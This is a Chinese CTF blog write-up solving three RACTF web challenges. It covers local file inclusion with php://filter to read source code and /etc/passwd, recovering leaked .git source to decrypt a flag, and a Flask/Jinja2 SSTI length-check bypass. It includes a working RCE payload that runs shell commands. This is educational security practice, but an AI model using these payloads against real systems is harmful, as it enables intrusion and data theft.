RACTF Web题Writeup


RACTF Web 题 Writeup

RACTF Web All AK. 🎉🎉🎉
iShot2021-10-09 15.00.18.png

notrequired

1. 基础判断

打开会自动跳转到/index.php?file=index.html
尝试任意文件读取,成功读取 /etc/passwd
image.png

2. 读取文件

使用 php://filter 过滤器读取 index.php 的 base64 编码字符串
image.png
解码得到:

<?php

if(!isset($_GET["file"])){
    header("location: http://ctf.bennetthackingcommunity.cf:8333/index.php?file=index.html");
    exit;
}

else{
    require($_GET['file']);
}

#note to myself: delete /bin/secrets.txt!
?>

根据提示,读取 /bin/secrets.txt
image.png
BUHC替换为DO即为 Flag。
Get Flag!

git commit -m “whatever”

  1. 打开页面,得到一段加密的字符串和提示:
+M/pqMuo4pevO4qE7ETogLZjXSoiLhuqpmWh21pKXOpjftRMSq+ltAaloVOlwR3cGkaBeYxLQEb2kJ7FZg4UBxawjJvpcyKebpVoz6no
Only if you could see the source code.
  1. 尝试扫描路径,发现存在**/.git/**路径

利用.git 源代码泄露利用工具 GitHack ,得到网站源代码

├── Crypt
│   ├── AES.php
│   ├── Base.php
│   ├── Blowfish.php
│   ├── DES.php
│   ├── Hash.php
│   ├── RC2.php
│   ├── RC4.php
│   ├── RSA.php
│   ├── Random.php
│   ├── Rijndael.php
│   ├── TripleDES.php
│   └── Twofish.php
├── File
│   ├── ANSI.php
│   ├── ASN1.php
│   └── X509.php
├── Math
│   └── BigInteger.php
├── Net
│   ├── SCP.php
│   ├── SFTP
│   │   └── Stream.php
│   ├── SFTP.php
│   ├── SSH1.php
│   └── SSH2.php
├── System
│   ├── SSH
│   │   └── Agent.php
│   └── SSH_Agent.php
├── bootstrap.php
├── index.php
├── openssl.cnf
└── tempCodeRunnerFile.py
  1. 审计代码,发现index.php里有个crypto类,存在两个方法encryp()decrypt(),即加密和解密的方法

  1. 解密过程

  1. 调用decrypt()方法解密
$privatekey = "mRHpcEckKATdwDC/CwpRinDTiAYrn9lzWpTo277omKs=";
$encrypted = "rI6D6aK8m1HhT1oSfsP87trNCrLMMc0MoySGaVbku4H9A3WqS1CgEbhAdZ3VWMAoFuPr9WfG2s5szKfgUFnKnzqv7CieKQvyK/tplDZp ";
$dnc = crypto::decrypt($encrypted, $privatekey);
echo $dnc;
  1. 采坑

这里有个坑,解密代码中调用了sodium_crypto_secretbox_open()这个方法,而这个方法只有 (PHP 7 >= 7.2.0, PHP 8) 的版本才有,使用其它 PHP 版本运行会报错

  1. 运行解密代码,get flag!

madlib

1、打开页面点击 source 得到源代码

image.png

from flask import Flask, render_template_string, request, send_from_directory

app = Flask(__name__)

@app.route('/')
def index():
    return send_from_directory('html', 'index.html')

@app.route('/madlib', methods=['POST'])
def madlib():
    if len(request.json) == 5:
        verb = request.json.get('verb')
        noun = request.json.get('noun')
        adjective = request.json.get('adjective')
        person = request.json.get('person')
        place = request.json.get('place')
        params = [verb, noun, adjective, person, place]
        if any(len(i) > 21 for i in params):
            return 'your words must not be longer than 21 characters!', 403
        madlib = f'To find out what this is you must {verb} the internet then get to the {noun} system through the visual MAC hard drive and program the open-source but overriding the bus won\'t do anything so you need to parse the online SSD transmitter, then index the neural DHCP card {adjective}.{person} taught me this trick when we met in {place} allowing you to download the knowledge of what this is directly to your brain.'
        return render_template_string(madlib)
    return 'This madlib only takes five words', 403

@app.route('/source')
def show_source():
    return send_from_directory('/app/', 'app.py')

app.run('0.0.0.0', port=1337)

2、填写信息,提交

image.png

3. 抓包

image.png

4. 分析源代码

根据源代码可以判断出这是一道 SSTI 题,需要满足以下条件:

  • post 提交 json 数据到 /madlib
  • json 长度等于 5
  • json 数据中的 verb、noun、adjective、person、place、params 长度不能超过 21

5. 测试 SSTI

在 verb 处输入 24 输出 24
image.png

6. 绕过长度判断 RCE

这一步卡了挺久的,后来想到了:既然是 json 格式的数据,那么是否可以嵌套 array 呢?尝试了一下发现果然可以
image.png
成功绕过长度限制!

7. RCE

可以把字符串内容写到 get 参数中,使用 request.args.参数名称读取:

POST /madlib?e=__import__('os').popen('ls').read()

{"verb":["{{().__class__.__bases__[0].__subclasses__()[64].__init__.__globals__['__builtins__']['eval'](request.args.e)}}",2],"noun":"456","adjective":"333","person":"444","place":"555"}

image.png

8. Get Flag

POST /madlib?e=__import__('os').popen('cat+flag.txt').read()

{"verb":["{{().__class__.__bases__[0].__subclasses__()[64].__init__.__globals__['__builtins__']['eval'](request.args.e)}}",2],"noun":"456","adjective":"333","person":"444","place":"555"}

image.png


文章作者: Truda
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Truda !
评论
  目录